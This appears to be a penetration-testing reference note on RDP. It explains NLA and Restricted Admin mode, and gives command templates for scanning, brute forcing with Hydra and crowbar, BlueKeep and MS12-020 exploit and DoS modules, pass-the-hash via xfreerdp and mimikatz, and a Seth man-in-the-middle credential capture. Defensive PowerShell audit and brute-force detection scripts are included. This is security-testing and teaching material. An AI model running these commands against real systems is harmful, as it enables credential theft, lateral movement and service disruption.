# 3389 - RDP

### Overview

The `Remote Desktop Protocol (RDP)` is a proprietary protocol developed by Microsoft which provides a user with a graphical interface to connect to another computer over a network connection. The user employs `RDP` client software for this purpose, while the other computer must run `RDP` server software.

The `RDP` authentication mechanism relies on Windows local or Active Directory domain credentials.

**Network Level Authentication NLA**

`RDP` may use `Network Level Authentication (NLA)`, introduced in `RDP 6.0` and initially supported in Microsoft Windows Vista / Windows Server 2008. `NLA` requires the connecting user to authenticate before a session is established with the server, which avoids consuming server resources to load the graphical login screen for unauthenticated clients.

**Restricted Admin mode**

The `Restricted Admin mode` is a security feature introduced in the Microsoft Windows 8.1 and Server 2012 R2 operating systems. The feature has been backported to Windows 7 and Server 2008.

`Restricted Admin mode` prevents the connecting user's credentials from being stored on the remote host by transforming the logon into a `network logon` (`Type 3`) instead of a `remote interactive logon` (`Type 10`). Indeed, for a `remote interactive logon`, the plaintext password is provided and the user's credentials are stored in the `LSASS` process of the remote host. In `Restricted Admin mode`, no form of credentials (plaintext password, `LM` / `NTLM` hashes or `Kerberos` `TGT`) is stored on the remote host.

`Restricted Admin mode` must be enabled on the remote host (`DisableRestrictedAdmin` registry value (`REG_DWORD`) set to `0`, which is not the case by default) and the client must connect in `Restricted Admin mode` (for example: `mstsc.exe /restrictedAdmin`). Note that enabling `Restricted Admin mode` allows `Pass-the-hash` authentication over `RDP`.

Only members of the local `Administrators` group may authenticate in `Restricted Admin` mode, and the network identity of the `RDP` session (used for remote access to other resources over the network) will, by default, be the `RDP` host machine account. This authentication using the `RDP` host machine account can be disabled by setting the `DisableRestrictedAdminOutboundCreds` registry value (`REG_DWORD`) to `1`.
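The `NLA` and `Restricted Admin mode` settings above can be audited on a host from an elevated PowerShell session. The following script is an added example and not part of the original notes; the registry paths are the standard Windows locations of these values, and the interpretation of each value follows the text above.

```powershell
# Added example (not from the original notes): read the registry values that govern
# the NLA and Restricted Admin behaviour described above and report the resulting
# RDP posture of the local host. Run from an elevated PowerShell session.
$Lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$Ts  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
$Tcp = "$Ts\WinStations\RDP-Tcp"

function Get-RegDword {
    param([string]$Path, [string]$Name)
    # Returns $null when the value (or its key) does not exist, so the caller
    # can apply the operating system default instead of treating it as 0.
    try { [int](Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name }
    catch { $null }
}

function Get-RdpPosture {
    $deny     = Get-RegDword $Ts  'fDenyTSConnections'                   # 1 = RDP disabled
    $nla      = Get-RegDword $Tcp 'UserAuthentication'                   # 1 = NLA required
    $ra       = Get-RegDword $Lsa 'DisableRestrictedAdmin'               # 0 = Restricted Admin enabled
    $outbound = Get-RegDword $Lsa 'DisableRestrictedAdminOutboundCreds'  # 1 = no machine-account outbound auth

    # Restricted Admin is only active when the value exists and is exactly 0 (absent = disabled).
    $restrictedAdminOn = ($null -ne $ra -and $ra -eq 0)

    [pscustomobject]@{
        RdpEnabled             = ($deny -ne 1)
        NlaRequired            = ($nla -eq 1)
        RestrictedAdminEnabled = $restrictedAdminOn
        OutboundCredsDisabled  = ($outbound -eq 1)
        # NTLM-hash authentication over RDP requires Restricted Admin mode on the host.
        PassTheHashOverRdp     = ($deny -ne 1 -and $restrictedAdminOn)
    }
}

$posture = Get-RdpPosture
$posture | Format-List

if ($posture.RdpEnabled -and -not $posture.NlaRequired) {
    Write-Warning 'NLA is not required: the graphical logon screen is reachable before authentication.'
}
if ($posture.PassTheHashOverRdp) {
    Write-Warning 'Restricted Admin mode is enabled: NTLM-hash authentication over RDP is accepted for local Administrators.'
}
if ($posture.RestrictedAdminEnabled -and -not $posture.OutboundCredsDisabled) {
    Write-Warning 'Restricted Admin sessions authenticate outbound with the host machine account.'
}
```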

### Network scan

`Nmap` and the `Metasploit`'s `auxiliary/scanner/rdp/rdp_scanner` module can be used to scan the network for `RDP` services.

`Nmap`'s service detection and default `RDP` scripts may allow for the retrieval of information about the hosts (`NetBIOS` / `DNS` hostname, Windows product version, `SSL` / `TLS` subject and issuer, etc.). `Metasploit`'s `auxiliary/scanner/rdp/rdp_scanner` module will check whether or not `NLA` is enabled.

```
nmap -n -Pn -v -p 3389 -sV -sC -oA <NMAP_OUTPUT> <RANGE | CIDR>

msf > use auxiliary/scanner/rdp/rdp_scanner
msf auxiliary(scanner/rdp/rdp_scanner) > set RHOSTS <HOSTNAME | IP | CIDR | file:<PATH>>
```

### Authentication brute force

The local or Active Directory domain account lockout policies apply (depending on the type of authentication attempted) when connecting through `RDP`. Vertical brute forcing (many passwords against one account) may thus not be possible.

However, horizontal `RDP` brute forcing (one known password against many accounts) can be used for lateral movement once an account has been compromised. Indeed, the compromised account may not be a member of the local `Administrators` group (and thus cannot connect through `PsExec`-like tools, for example) but may be a member of the `Remote Desktop Users` group.

`Patator`, `Hydra` or the `crowbar` Python script can be used to brute force `RDP` access. `Patator` and `crowbar` both support `NLA` (as of December 2018, `Hydra` does not support `RDP` brute force against hosts with `NLA` enabled).

```
python crowbar.py -b rdp (-u <USERNAME | <DOMAIN\\USERNAME> | -U USERNAME_FILE) (-c <PASSWORD> | -C <PASSWORDS_LIST) -s <CIDR>

hydra -t 1 -V -l <USERNAME> (-p <PASSWORD> | -P <PASSWORDS_LIST) rdp://<IP | HOST>
```
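On the defensive side, the horizontal pattern described above (one source trying many distinct accounts, each once or twice) is visible in the Security event log. The following PowerShell script is an added example, not part of the original notes; the event IDs and field names are the standard Windows ones, while the `MinAttempts` threshold and the horizontal/vertical heuristic are assumptions to tune per environment.

```powershell
# Added example (not part of the original notes): report failed RDP logons from the
# Security log per source address and flag the horizontal pattern described above
# (one source, many distinct accounts). Thresholds are assumptions to tune locally.
function Get-RdpFailedLogons {
    param([int]$Hours = 24)
    # 4625 = failed logon. Logon Type 10 is RemoteInteractive (RDP); with NLA
    # enabled the CredSSP pre-authentication failure is logged as Type 3 instead.
    $ms = $Hours * 3600000
    $xpath = "*[System[EventID=4625 and TimeCreated[timediff(@SystemTime) <= $ms]]]" +
             " and *[EventData[Data[@Name='LogonType']='10' or Data[@Name='LogonType']='3']]"
    Get-WinEvent -LogName Security -FilterXPath $xpath -ErrorAction SilentlyContinue |
        ForEach-Object {
            $d = ([xml]$_.ToXml()).Event.EventData.Data
            [pscustomobject]@{
                Time      = $_.TimeCreated
                User      = ($d | Where-Object Name -eq 'TargetUserName').'#text'
                Source    = ($d | Where-Object Name -eq 'IpAddress').'#text'
                LogonType = ($d | Where-Object Name -eq 'LogonType').'#text'
                # SubStatus 0xC000006A = wrong password, 0xC0000064 = unknown user name.
                SubStatus = ($d | Where-Object Name -eq 'SubStatus').'#text'
            }
        }
}

function Get-RdpBruteForceSummary {
    param([int]$Hours = 24, [int]$MinAttempts = 20)
    Get-RdpFailedLogons -Hours $Hours |
        Group-Object Source |
        Where-Object Count -ge $MinAttempts |
        ForEach-Object {
            $distinct = @($_.Group.User | Sort-Object -Unique).Count
            [pscustomobject]@{
                Source        = $_.Name
                Attempts      = $_.Count
                DistinctUsers = $distinct
                # Roughly one or two tries per account = horizontal (spraying) pattern;
                # many tries against few accounts = vertical guessing, which trips lockout.
                Pattern       = $(if ($distinct -ge [math]::Max(5, $_.Count / 2)) { 'horizontal' } else { 'vertical' })
            }
        }
}

Get-RdpBruteForceSummary | Sort-Object Attempts -Descending | Format-Table -AutoSize
```

Sources with many distinct users and few attempts per user are the lateral-movement pattern; a `-` source address usually means the failure came through `NLA`, where the client address is not always recorded.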

### Known vulnerabilities

`nmap` can be used to check for the `CVE-2012-0002` / `MS12-020` vulnerability. `Metasploit`'s `auxiliary/scanner/rdp/cve_2019_0708_bluekeep` module and `rdpscan` can be used to scan for `BlueKeep` / `CVE-2019-0708`.

```
# BlueKeep CVE-2019-0708
msf > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set RHOSTS file:<PATH>
msf auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set THREADS <THREADS_NUMBER>

rdpscan.exe --file <HOSTS_FILE>

# CVE-2012-0002 / MS12-020
nmap -v -p 3389 --script rdp-vuln-ms12-020 <HOST>
msf > use auxiliary/scanner/rdp/ms12_020_check
```

**BlueKeep CVE-2019-0708**

A heap corruption in the `RDP` implementation allows for arbitrary code execution at the `SYSTEM` level, pre-authentication.

Microsoft identified the following Windows versions as vulnerable:

* Windows XP
* Windows Vista
* Windows 7
* Windows Server 2003
* Windows Server 2008
* Windows Server 2008 R2

Newer Windows versions (Windows 8 and later, Windows Server 2012 and later) are not vulnerable.

The `Metasploit` module `exploit/windows/rdp/cve_2019_0708_bluekeep_rce` can be used to exploit the vulnerability. Note that the exploit is not yet polished.

```
msf> use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
```

**CVE-2012-0002 / MS12-020**

The `CVE-2012-0002` / `MS12-020` vulnerability can be used both to cause a denial of service and to remotely execute code on the target.

`Metasploit`'s `auxiliary/dos/windows/rdp/ms12_020_maxchannelids` module may be used to trigger a `DoS` of the target:

```
msf> use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
```

As of December 2018, no public proof-of-concept code that results in remote code execution is available.

### RDP clients

**Windows**

On Windows, the built-in `Remote Desktop Connection` (`mstsc.exe`) application ("Connexion Bureau à distance" on French Windows) or the `Remote Desktop Manager` and `mRemoteNG` third-party applications can be used as `RDP` clients.

The `Remote Desktop Manager` and `mRemoteNG` clients allow for the configuration and storage of multiple `RDP` connections (host and authentication information). A free edition of `Remote Desktop Manager` is available, as well as a commercial enterprise edition.

**Linux**

On Linux, `FreeRDP` (`xfreerdp`), `rdesktop` or `Remmina` (GUI) can be used as `RDP` clients.

```
# xfreerdp.

xfreerdp [/size:<SCREEN_SIZE_PERCENT>%] /u:'<DOMAIN | WORKGROUP>\<USERNAME>' /p:'<PASSWORD>' /v:<HOSTNAME | IP>[:<PORT>]

# Disables NLA for hosts that do not require Network Level Authentication.
xfreerdp -sec-nla /u:'<DOMAIN | WORKGROUP>\<USERNAME>' /p:'<PASSWORD>' /v:<HOSTNAME | IP>

# Connection in Restricted Admin mode.
xfreerdp /restricted-admin /u:'<DOMAIN | WORKGROUP>\<USERNAME>' /p:'<PASSWORD>' /v:<HOSTNAME | IP>

# For RD Web Access through a Remote Desktop Gateway.
# <RDP_FILE> is the RDP client configuration file retrieved from the RD Web Access web interface.
xfreerdp <RDP_FILE> /d:<DOMAIN | WORKGROUP> /u:<USERNAME> /p:'<PASSWORD>' /gt:rpc

# rdesktop.
rdesktop -d '<DOMAIN | WORKGROUP>' -u '<USERNAME>' <HOSTNAME | IP>[:<PORT>]
```

### Pass-the-hash over RDP

The `xfreerdp` client on Linux, and `mimikatz` combined with the built-in `mstsc.exe` client on Windows, can be used to authenticate through `RDP` using an account's `NTLM` hash. The remote host must have the `Restricted Admin mode` feature enabled.

```
# Linux.
xfreerdp /u:'<DOMAIN | WORKGROUP>\<USERNAME>' /pth:<HASH> /v:<HOSTNAME | IP>

# Windows.
# The Remote Desktop Connection (mstsc.exe) client will display the currently logged user information but the network connection will be established using the identity specified to mimikatz's sekurlsa::pth.
sekurlsa::pth /domain:<. | DOMAIN_FQDN> /user:<USERNAME> /ntlm:<NT_HASH> /run:"mstsc.exe /restrictedadmin"
```

### Man-in-the-middle attack

`Seth` is a tool written in Python and Bash to perform a `MitM` of `RDP` connections, attempting to downgrade the connection in order to extract clear text credentials.

`Seth` can be used regardless of whether `Network Level Authentication (NLA)` is enabled on the targeted `RDP` host.

`Seth` will notably:

* Spoof `ARP` replies to redirect traffic from the victim host to the attacker machine and then on to the target `RDP` server.
* Configure an `iptables` rule to reject `SYN` packets in order to prevent direct `RDP` authentication.
* Clone the `SSL` certificate (replacing only the public key and signature).
* Block traffic to port 88 to downgrade `Kerberos` authentication to `NTLM`.

Note that the user will be presented with a certificate error warning that must be accepted before the clear text credentials are sent.

In case of a successful attack:

* Clear text credentials of the user logging in are obtained.
* A command can be executed on the targeted host.
* The victim's keyboard inputs are retrieved.

```
# Unless the RDP host is on the same subnet as the victim machine, the last IP address must be that of the gateway.
# The COMMAND is executed on the RDP host by simulating WIN+R.
# The COMMAND should not contain special characters (powershell -enc <STRING> can be used).

seth.sh <INTERFACE> <ATTACKER_IP> <VICTIM_IP> <GATEWAY_IP | HOST_IP> [<COMMAND>]
```

### Session Hijacking

If `Administrator` / `NT AUTHORITY\SYSTEM` privileges can be obtained on a host, the `RDP` sessions of other users can be hijacked. This can be used to access the host as the hijacked user through a GUI session without knowing their password.

To hijack an `RDP` session, refer to the `[Windows] Post Exploitation` note.
